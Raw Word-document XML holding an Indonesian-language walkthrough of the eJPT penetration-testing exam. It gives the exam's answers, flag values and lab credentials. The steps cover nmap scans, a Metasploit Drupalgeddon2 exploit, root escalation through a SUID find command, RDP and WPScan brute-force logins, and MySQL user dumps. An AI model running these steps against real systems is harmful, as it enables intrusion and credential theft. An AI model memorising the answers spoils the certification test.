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07C22B" w14:textId="27AB4390" w:rsidR="00EA1CC7" w:rsidRPr="00EA1CC7" w:rsidRDefault="00EA1CC7" w:rsidP="00EA1CC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WALTROUGH EJPT EXAM – Leri Armansyah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152A6836" w14:textId="42EE177C" w:rsidR="00A41054" w:rsidRPr="00D524F9" w:rsidRDefault="00A41054" w:rsidP="00A11572">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D524F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>WARNING!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E150B" w14:textId="4083D6D7" w:rsidR="00A41054" w:rsidRDefault="00A41054" w:rsidP="00A11572">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DARI AWAL SETUP PAKE WORKSPACE NYA METASPLOIT BIAR HASIL SCAN TERSIMPAN DI DATABASENYA BIAR GA BINGUNG NYARI NYARI, NMAP PAKE METASPLOIT MODUL AJA (DB_NMAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09314BA4" w14:textId="2F3EBECC" w:rsidR="00A11572" w:rsidRDefault="00A11572" w:rsidP="00A11572">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11572">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What version of MySQL is running on the system hosting a Drupal site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E27A600" w14:textId="07B10755" w:rsidR="00CD25DD" w:rsidRPr="00A11572" w:rsidRDefault="00CD25DD" w:rsidP="00A11572">
      <w:r w:rsidRPr="00CD25DD">
        <w:t>MySQL 5.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D5423" w14:textId="17E2DC18" w:rsidR="002C79C0" w:rsidRDefault="00A11572" w:rsidP="00A11572">
      <w:r w:rsidRPr="00A11572">
        <w:t>nmap -sV -sC 192.168.100.52</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (IP drupalnya)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11572">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A11572">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75225138" wp14:editId="48B5FE0B">
            <wp:extent cx="5039995" cy="3999230"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1270"/>
            <wp:docPr id="100896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674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F688" w14:textId="77777777" w:rsidR="00A11572" w:rsidRPr="00A11572" w:rsidRDefault="00A11572" w:rsidP="00A11572">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11572">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the IP address of the host running WordPress?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89D3D4" w14:textId="5818DB69" w:rsidR="00A11572" w:rsidRDefault="00A11572" w:rsidP="00A11572">
      <w:r w:rsidRPr="00A11572">
        <w:lastRenderedPageBreak/>
        <w:t>192.168.100.50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (akses aja di web browser)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11572">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A11572">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CA63338" wp14:editId="066C0235">
            <wp:extent cx="5039995" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="1096904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0476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6E8F" w14:textId="77777777" w:rsidR="00DC6B4F" w:rsidRPr="003813D5" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What version of Windows is running on the host running WordPress?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE78D4" w14:textId="6944966D" w:rsidR="00DC6B4F" w:rsidRPr="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r w:rsidRPr="00DC6B4F">
        <w:t>Windows Server 2012 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A1B15" w14:textId="7ABEED9F" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r w:rsidRPr="00DC6B4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09AEEE17" wp14:editId="5C745401">
            <wp:extent cx="5039995" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="125150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009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62C9" w14:textId="53F697DF" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>Yang pake wordpress tadi 192.168.100.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC94342" w14:textId="647C57A3" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>Nmap -sC -sV 192.168.100.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612126AA" w14:textId="77777777" w:rsidR="00DC6B4F" w:rsidRPr="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How many hosts on the DMZ network are running Windows?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4CB4D" w14:textId="7D2ABD2B" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>Disini terdeteksi 3 host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8C2B5" w14:textId="77777777" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>192-168-100-51 windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE26CA0" w14:textId="77777777" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>192-168-100-50 windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2AF631" w14:textId="756E0BEA" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r>
        <w:t>192.168.100.55 windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04FB19" w14:textId="7BFE8526" w:rsidR="00DC6B4F" w:rsidRDefault="00DC6B4F" w:rsidP="00DC6B4F">
      <w:r w:rsidRPr="00DC6B4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E470926" wp14:editId="6359CBC1">
            <wp:extent cx="5039995" cy="2199005"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1990068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687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BDAE" w14:textId="48E2A688" w:rsidR="0049397D" w:rsidRPr="003813D5" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049397D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How many hosts on the DMZ network are running a database server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C285D0" w14:textId="22F4ECBA" w:rsidR="0049397D" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:r w:rsidRPr="0049397D">
        <w:t>nmap -p 3306,5432,1433,1521,27017,6379 &lt;IP_TARGET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4A403" w14:textId="7D7F3138" w:rsidR="0049397D" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>terdeteksi 1 yang open 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898C894" w14:textId="77777777" w:rsidR="0049397D" w:rsidRPr="0049397D" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049397D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the IP address of the host vulnerable to an SSH brute-force attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDDE437" w14:textId="40D87EFB" w:rsidR="0049397D" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:r w:rsidRPr="0049397D">
        <w:t>192.168.100.52</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (karna yang open port ssh Cuma ini)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628EFEE2" w14:textId="54409F14" w:rsidR="0049397D" w:rsidRDefault="0049397D" w:rsidP="0049397D">
      <w:r w:rsidRPr="0049397D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E23AF10" wp14:editId="5D644D33">
            <wp:extent cx="5039995" cy="1018540"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="209481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135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D502" w14:textId="77777777" w:rsidR="00B5576E" w:rsidRPr="00B5576E" w:rsidRDefault="00B5576E" w:rsidP="00B5576E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5576E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What type of vulnerability can be exploited to gain access to WINSERVER-03?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DB089" w14:textId="77777777" w:rsidR="00B5576E" w:rsidRDefault="00B5576E" w:rsidP="00B5576E">
      <w:r w:rsidRPr="00B5576E">
        <w:t>SMB Brute Force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bisa dibruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E00E6E" w14:textId="02800120" w:rsidR="0049397D" w:rsidRDefault="00B5576E" w:rsidP="00B5576E">
      <w:r w:rsidRPr="00B5576E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B7D510" wp14:editId="6D157C62">
            <wp:extent cx="5039995" cy="394970"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:docPr id="77172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202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76E">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D12EB" w14:textId="77777777" w:rsidR="00520A91" w:rsidRPr="00520A91" w:rsidRDefault="00520A91" w:rsidP="00520A91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520A91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the password of the user account "dbadmin" on the Linux server hosting Drupal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56791D65" w14:textId="0C8D788E" w:rsidR="00520A91" w:rsidRDefault="00520A91" w:rsidP="00520A91">
      <w:r w:rsidRPr="00520A91">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00520A91">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A568D98" wp14:editId="34299989">
            <wp:extent cx="5039995" cy="2620010"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="27910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048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5140" w14:textId="78108BAF" w:rsidR="00520A91" w:rsidRDefault="00520A91" w:rsidP="00520A91">
      <w:r>
        <w:t>Passnya “sayang” coba aja login di web nya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F72BFD" w14:textId="399CBC74" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="00520A91">
      <w:r>
        <w:t>Validasinya coba login satu satu user dbadmin pass nya sesuai dengan pilihan ganda nya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35210AC1" w14:textId="77777777" w:rsidR="005616A1" w:rsidRPr="005616A1" w:rsidRDefault="005616A1" w:rsidP="005616A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005616A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The server hosting Drupal contains the file /home/auditor/flag.txt. What is the value of the flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377328BB" w14:textId="77777777" w:rsidR="005616A1" w:rsidRDefault="005616A1" w:rsidP="005616A1">
      <w:r w:rsidRPr="005616A1">
        <w:t>82096d8db76f4825bbf4e7bf93841c76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157C2E5A" w14:textId="389F6FF4" w:rsidR="005616A1" w:rsidRDefault="005616A1" w:rsidP="005616A1">
      <w:r>
        <w:t>Cara masuk nya pake Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AE937" w14:textId="77777777" w:rsidR="005616A1" w:rsidRDefault="005616A1" w:rsidP="005616A1">
      <w:r w:rsidRPr="005616A1">
        <w:lastRenderedPageBreak/>
        <w:t>use exploit/unix/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D2A1C" w14:textId="58826292" w:rsidR="00370079" w:rsidRDefault="00370079" w:rsidP="005616A1">
      <w:r w:rsidRPr="00370079">
        <w:t>set TARGETURI /drupal/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC31BBA" w14:textId="063955A0" w:rsidR="001763A4" w:rsidRPr="005616A1" w:rsidRDefault="001763A4" w:rsidP="005616A1">
      <w:r>
        <w:t>set rhost 192.168.100.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40449D7F" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="005616A1" w:rsidP="005616A1">
      <w:r w:rsidRPr="005616A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340E015A" wp14:editId="18569AF6">
            <wp:extent cx="4077269" cy="381053"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30518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851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40B8" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="005616A1">
      <w:r>
        <w:t xml:space="preserve">Dilanjut ke </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612B218" w14:textId="2635910A" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="005616A1">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC4BAA" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFA76E" w14:textId="6D2A52E7" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>www-data (output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A797A" w14:textId="077D205D" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>find / -user root -perm -4000 -exec ls -ldb {} \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AF35B0" w14:textId="34EB0AAB" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>find: missing argument to `-exec' (output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A113A03" w14:textId="77A5D84D" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>find . -exec /bin/bash -p \; -quit (privilege escalation ke root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB83CB" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D4DF3" w14:textId="06463563" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC42A02" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>cat /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8E182" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>a44be5bb3b0d4517ae0f22551dd64599</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEC570" w14:textId="6F9DDB03" w:rsidR="005616A1" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r w:rsidRPr="002A7ECE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E7E96B" wp14:editId="1F60EE86">
            <wp:extent cx="5039995" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="1100490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900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6A1" w:rsidRPr="005616A1">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7BFF30" w14:textId="651956E1" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t xml:space="preserve">Untuk masuk ke mysql nya drupal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE2403" w14:textId="61A84385" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bruteforce rdp ke ip .52 &gt; kalo udah dapet rdp buat login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A04080" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>root@kali:~# xfreerdp /u:administrator /p:swordfish /v:192.168.100.52:3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EE3F5" w14:textId="28D7231A" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>root@kali:~# xfreerdp /u:root /p:swordfish /v:192.168.100.52:3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFA4D7" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>Buka terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3C378" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t xml:space="preserve">mysql </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E93A2" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C927ACD" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>use drupal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DF938" w14:textId="77777777" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>select * from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A0085" w14:textId="6DCE9ECD" w:rsidR="002A7ECE" w:rsidRDefault="002A7ECE" w:rsidP="002A7ECE">
      <w:r>
        <w:t>(nanti bakal muncul isi dari akun yang ada di sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104AD32A" w14:textId="46846706" w:rsidR="003813D5" w:rsidRDefault="003813D5" w:rsidP="002A7ECE">
      <w:r w:rsidRPr="003813D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60712D57" wp14:editId="46F09086">
            <wp:extent cx="5039995" cy="2642870"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:docPr id="3317691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69167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4E3B" w14:textId="77777777" w:rsidR="006378A3" w:rsidRPr="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006378A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the email of the admin user on the Drupal site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC245A" w14:textId="77777777" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>itu diatas evidencenya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01E4A2" w14:textId="4C3E1A22" w:rsidR="006378A3" w:rsidRPr="006378A3" w:rsidRDefault="006378A3" w:rsidP="002A7ECE">
      <w:r w:rsidRPr="006378A3">
        <w:t>admin@syntex.com</w:t>
      </w:r>
      <w:r w:rsidRPr="006378A3">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C93DF10" w14:textId="77777777" w:rsidR="00C023E4" w:rsidRPr="00C023E4" w:rsidRDefault="00C023E4" w:rsidP="00C023E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How many user accounts can be enumerated from the SAMBA server running on the system hosting Drupal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAAFB0A" w14:textId="711F879D" w:rsidR="00C023E4" w:rsidRDefault="00C023E4" w:rsidP="00C023E4">
      <w:r w:rsidRPr="00C023E4">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>3 (local user nya dapet 3 ubuntu,auditor,dbadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47845179" w14:textId="5314C495" w:rsidR="00C023E4" w:rsidRDefault="00C023E4" w:rsidP="00C023E4">
      <w:r w:rsidRPr="00C023E4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC676A6" wp14:editId="560D53AA">
            <wp:extent cx="5039995" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="154422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240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9F7E" w14:textId="77777777" w:rsidR="005E0B8D" w:rsidRDefault="005E0B8D" w:rsidP="00C023E4"/>
    <w:p w14:paraId="32BE5C0D" w14:textId="5C10613A" w:rsidR="005E0B8D" w:rsidRDefault="005E0B8D" w:rsidP="00C023E4">
      <w:r>
        <w:t>Cara mysql 192.168.100.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66146F00" w14:textId="26911493" w:rsidR="005E0B8D" w:rsidRDefault="005E0B8D" w:rsidP="00C023E4">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="003F7A53">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.100.50/phpmyadmin/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C69E836" w14:textId="25FE0E73" w:rsidR="002A7ECE" w:rsidRDefault="005E0B8D" w:rsidP="00C023E4">
      <w:r>
        <w:t>user “root” pass blank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB8C15" w14:textId="77777777" w:rsidR="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00C023E4"/>
    <w:p w14:paraId="5C57E903" w14:textId="77777777" w:rsidR="00CD25DD" w:rsidRPr="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00CD25DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD25DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What web server contains a file called "todo.txt"?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB77BBF" w14:textId="77777777" w:rsidR="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00CD25DD">
      <w:r>
        <w:t>RDP ke 192.168.100.55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02188735" w14:textId="485A143F" w:rsidR="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00CD25DD">
      <w:r w:rsidRPr="00CD25DD">
        <w:t>192.168.100.55 windows WINSERVER-03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAC7A0" w14:textId="77777777" w:rsidR="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00CD25DD">
      <w:r w:rsidRPr="00CD25DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="159825AF" wp14:editId="22074BD2">
            <wp:extent cx="4191585" cy="1857634"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="39348315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83153" name="Picture 1" descr="A computer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D13B" w14:textId="7B370C9A" w:rsidR="00CD25DD" w:rsidRDefault="00CD25DD" w:rsidP="00CD25DD">
      <w:r>
        <w:t>Ada tuh di c:\inetpub\wwwroot (bisa buka di filemanager)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD25DD">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA60B5" w14:textId="77777777" w:rsidR="006378A3" w:rsidRPr="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r w:rsidRPr="006378A3">
        <w:t>What is the name of the active theme on the WordPress site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE2359" w14:textId="18B60BE2" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r w:rsidRPr="006378A3">
        <w:t>Spintech</w:t>
      </w:r>
      <w:r w:rsidRPr="006378A3">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>IP wordpress 192.168.100.50 tapi gabisa langsung masuk ke wordpress harus tambahin di /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E4CB4" w14:textId="448CC6E4" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>192.168.100.50 wordpress.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72378864" w14:textId="2EA01F64" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r w:rsidRPr="006378A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE10CBA" wp14:editId="33267358">
            <wp:extent cx="5039995" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="158322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282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61B3" w14:textId="20E2EDAE" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>Bruteforce pake wp scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68644D7F" w14:textId="0CA5486B" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>admin:estrella</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766787CC" w14:textId="1224B85E" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
